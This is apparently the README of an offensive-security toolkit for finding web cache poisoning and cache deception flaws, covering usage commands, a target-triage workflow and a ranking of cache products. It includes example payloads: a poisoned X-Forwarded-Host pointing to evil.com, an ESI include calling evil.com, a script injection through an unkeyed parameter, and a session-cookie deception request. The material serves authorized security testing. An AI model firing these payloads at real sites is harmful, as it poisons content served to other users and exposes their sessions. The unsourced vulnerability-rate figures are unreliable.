A comprehensive toolkit for identifying and testing web cache vulnerabilities, with a focus on custom cache implementations (Varnish, Nginx) vs CDN caches (Cloudflare, Fastly).
This tool is for educational purposes and authorized security testing only.
- The author (G33L0) is NOT responsible for any misuse or damage caused by this tool.
- Always ensure you have explicit written permission before testing any systems.
- Unauthorized testing is illegal and unethical.
- Use this tool responsibly and only on systems you own or have permission to test.
- This tool is intended for bug bounty hunters and security professionals.
By using this tool, you agree to use it legally and ethically. Any misuse is solely the responsibility of the user.
- Cache Fingerprinter - Instantly identify cache technology (X-Cache vs CDN)
- Quick Bash Detector - Lightning-fast cache type identification
- Automatically categorizes targets by vulnerability potential
- Cache Scanner - General cache poisoning and deception testing
- X-Cache Hunter - Specialized scanner for Varnish/Nginx/Custom caches
- Automated vulnerability detection with severity ratings
- Cache poisoning detection (unkeyed headers, parameters)
- Cache deception testing (static extension bypass)
- Varnish-specific attacks (VCL injection, ESI injection)
- Nginx-specific attacks (method override, cache bypass)
- WordPress cache plugin vulnerability testing
- Detailed reporting with remediation suggestions
- Python 3.6+
- Linux/macOS (Windows with WSL)
- Basic tools:
curl,bash
# Clone the repository
git clone https://github.com/G33L0/cache-vulnerability-toolkit.git
cd cache-vulnerability-toolkit
# Install Python dependencies
pip3 install -r requirements.txt
# Make scripts executable
chmod +x *.sh *.py# Install via pip
pip3 install requests colorama urllib3
# Or use requirements.txt
pip3 install -r requirements.txt# Single URL
python3 cache_fingerprint.py -u https://target.com
# Batch scan
python3 cache_fingerprint.py -f targets.txt -o results.json
# Verbose mode
python3 cache_fingerprint.py -u https://target.com -v# Single URL
./quick-cache-detect.sh https://target.com
# Batch scan
./quick-cache-detect.sh -f targets.txt# Quick check
curl -sI https://target.com | grep -iE "x-varnish|x-nginx|cf-ray"
# Decision maker
curl -sI https://target.com | grep -qiE "x-varnish|x-nginx" && echo "✅ TEST IT!" || echo "❌ Skip"# Specialized X-Cache scanner
python3 xcache_hunter.py -u https://target.com
# With authentication
python3 xcache_hunter.py -u https://target.com -c "session=YOUR_TOKEN"
# Varnish-only tests
python3 xcache_hunter.py -u https://target.com --varnish-only
# Save report
python3 xcache_hunter.py -u https://target.com -o report.json# General cache scanner
python3 cache_scanner.py -u https://target.com
# With cookies
python3 cache_scanner.py -u https://target.com -c "session=abc123"
# Verbose mode
python3 cache_scanner.py -u https://target.com -vInstant cache technology detection
Identifies whether a site uses:
- ✅ High Priority: Varnish, Nginx, Custom X-Cache (30-40% vuln rate)
- ❌ Low Priority: Cloudflare, Fastly, Akamai (5-10% vuln rate)
Output:
- Cache technology
- Confidence level
- Vulnerability potential
- Specific recommendations
Use Case: Triage hundreds of targets to find high-value X-Cache sites
Specialized X-Cache vulnerability scanner
Focuses on custom cache implementations:
- Varnish (VCL injection, ESI injection)
- Nginx (method override, cache bypass)
- Custom reverse proxies
- WordPress cache plugins
Features:
- Automated fingerprinting
- Technology-specific tests
- Detailed vulnerability reporting
- JSON export for integration
Use Case: Deep testing of confirmed X-Cache targets
General cache vulnerability scanner
Tests for:
- Cache poisoning (12+ headers)
- Cache deception attacks
- Unkeyed parameters
- Cookie-based vulnerabilities
Features:
- Comprehensive header testing
- Path manipulation detection
- Multi-vector testing
- Clear severity ratings
Use Case: Thorough testing of any cached site
Lightning-fast bash detector
Advantages:
- No dependencies (pure bash + curl)
- Color-coded output
- Instant results (<1 second)
- Batch scanning support
Use Case: Quick triage in the field or on mobile terminals
| Cache Type | Vulnerability Rate | Recommendation |
|---|---|---|
| Varnish | ~30-40% | ✅ HIGH PRIORITY |
| Nginx Caching | ~30-40% | ✅ HIGH PRIORITY |
| Custom X-Cache | ~30-40% | ✅ HIGH PRIORITY |
| WordPress Plugins | ~40-50% | ✅ HIGH PRIORITY |
| Cloudflare | ~5-10% | ❌ Skip/Low Priority |
| Fastly | ~10-15% | |
| Akamai | ~5% | ❌ Skip |
✅ High Priority Headers:
X-Varnish: 123456 789012 → Varnish (BEST TARGET!)
X-Nginx-Cache: HIT → Nginx caching
X-Cache: HIT → Custom (no CDN)
X-WP-Total-Cache → WordPress plugin
❌ Low Priority Headers:
CF-Ray: abc123 → Cloudflare (skip)
X-Fastly-Request-ID → Fastly (skip or ESI only)
X-Amz-Cf-Id → CloudFront (skip)
# 1. Collect subdomains
subfinder -d target.com -o subs.txt
# 2. Check alive hosts
cat subs.txt | httpx -silent -o alive.txt
# 3. Fingerprint cache types
python3 cache_fingerprint.py -f alive.txt -o results.json
# 4. Extract high priority targets
cat results.json | jq '.high_priority[].url' > high-priority.txt
# 5. Test high priority targets
cat high-priority.txt | while read url; do
python3 xcache_hunter.py -u "$url" -v
sleep 5
done# Quick check if worth testing
./quick-cache-detect.sh https://target.com
# If HIGH PRIORITY, run full scan
python3 xcache_hunter.py -u https://target.com -o report.json# Scan multiple targets
python3 cache_fingerprint.py -f targets.txt
# Results automatically categorized:
# - High Priority (X-Cache targets)
# - Medium Priority (worth investigating)
# - Low Priority (CDNs to skip)Description: Injecting malicious content into cached responses
Detection:
- Tests 12+ common unkeyed headers
- Identifies reflected values
- Confirms cache persistence
Example:
curl -H "X-Forwarded-Host: evil.com" https://target.com/app.js
# If evil.com appears in cached response → VULNERABLEDescription: Tricking cache into storing sensitive data publicly
Detection:
- Tests static extensions on dynamic paths
- Path delimiter confusion
- Authenticated content caching
Example:
curl -b "session=TOKEN" https://target.com/profile.css
# If sensitive data cached publicly → VULNERABLEDescription: Edge Side Includes injection for XSS/SSRF
Detection:
- Checks for ESI capability
- Tests ESI tag processing
- Validates injection vectors
Example:
curl "https://target.com?x=<esi:include src='http://evil.com'/>"
# If ESI processed → VULNERABLEDescription: Query parameters not included in cache key
Detection:
- Tests common parameters
- Validates reflection and caching
- Confirms persistence
Example:
curl "https://target.com?utm_source=<script>alert(1)</script>"
# If cached and served to other users → VULNERABLEpython3 cache_fingerprint.py -u <URL> # Single URL
python3 cache_fingerprint.py -f <FILE> # Batch scan
python3 cache_fingerprint.py -u <URL> -v # Verbose
python3 cache_fingerprint.py -f <FILE> -o <JSON> # Save reportpython3 xcache_hunter.py -u <URL> # Full scan
python3 xcache_hunter.py -u <URL> -c "cookie" # With auth
python3 xcache_hunter.py -u <URL> --varnish-only # Varnish tests only
python3 xcache_hunter.py -u <URL> --nginx-only # Nginx tests only
python3 xcache_hunter.py -u <URL> -v # Verbose
python3 xcache_hunter.py -u <URL> -o report.json # Save reportpython3 cache_scanner.py -u <URL> # Basic scan
python3 cache_scanner.py -u <URL> -c "cookie" # With auth
python3 cache_scanner.py -u <URL> -v # Verbose./quick-cache-detect.sh <URL> # Single URL
./quick-cache-detect.sh -f <FILE> # Batch scancache_vulnerability_hunting_guide.md- Comprehensive testing guidexcache_target_guide.md- X-Cache specific strategiescache_detection_cheatsheet.md- Quick referencecache_cheatsheet.md- One-liner commands
- PortSwigger Web Academy - Cache poisoning labs
- James Kettle's Research - Original research
- OWASP Testing Guide - Security testing methodology
Contributions are welcome! Please feel free to submit a Pull Request.
- Fork the repository
- Create a feature branch (
git checkout -b feature/AmazingFeature) - Commit your changes (
git commit -m 'Add some AmazingFeature') - Push to the branch (
git push origin feature/AmazingFeature) - Open a Pull Request
- Initial release
- Cache fingerprinting tool
- X-Cache specialized scanner
- General cache vulnerability scanner
- Bash quick detector
- Comprehensive documentation
G33L0
- Telegram: @x0x0h33l0
- GitHub: G33L0
For questions, suggestions, or collaborations, feel free to reach out!
This project is licensed under the MIT License - see the LICENSE file for details.
READ THIS CAREFULLY:
This toolkit is provided for educational and ethical security testing purposes only. The tools included are designed to help security professionals and bug bounty hunters identify vulnerabilities in systems they have explicit permission to test.
You are responsible for:
- Obtaining proper authorization before testing any system
- Complying with all applicable laws and regulations
- Using the tools ethically and responsibly
- Any consequences resulting from misuse of these tools
The author (G33L0) explicitly disclaims responsibility for:
- Any misuse or abuse of these tools
- Any damage caused by use of these tools
- Any illegal activities conducted with these tools
- Any violations of terms of service or acceptable use policies
By downloading, installing, or using these tools, you agree to:
- Use them only on systems you own or have written permission to test
- Follow all applicable laws and regulations
- Accept full responsibility for your actions
- Not hold the author liable for any damages or consequences
- Thanks to the bug bounty community for continuous research
- PortSwigger for groundbreaking cache poisoning research
- All contributors who help improve this toolkit
If you find this toolkit useful, please:
- ⭐ Star this repository
- 🔄 Share with fellow bug bounty hunters
- 📢 Spread the word on social media
- 💬 Join the conversation on Telegram
Happy Hunting! 🎯
Remember: Always test ethically and legally. Good luck with your bug bounties!
Made with ❤️ by G33L0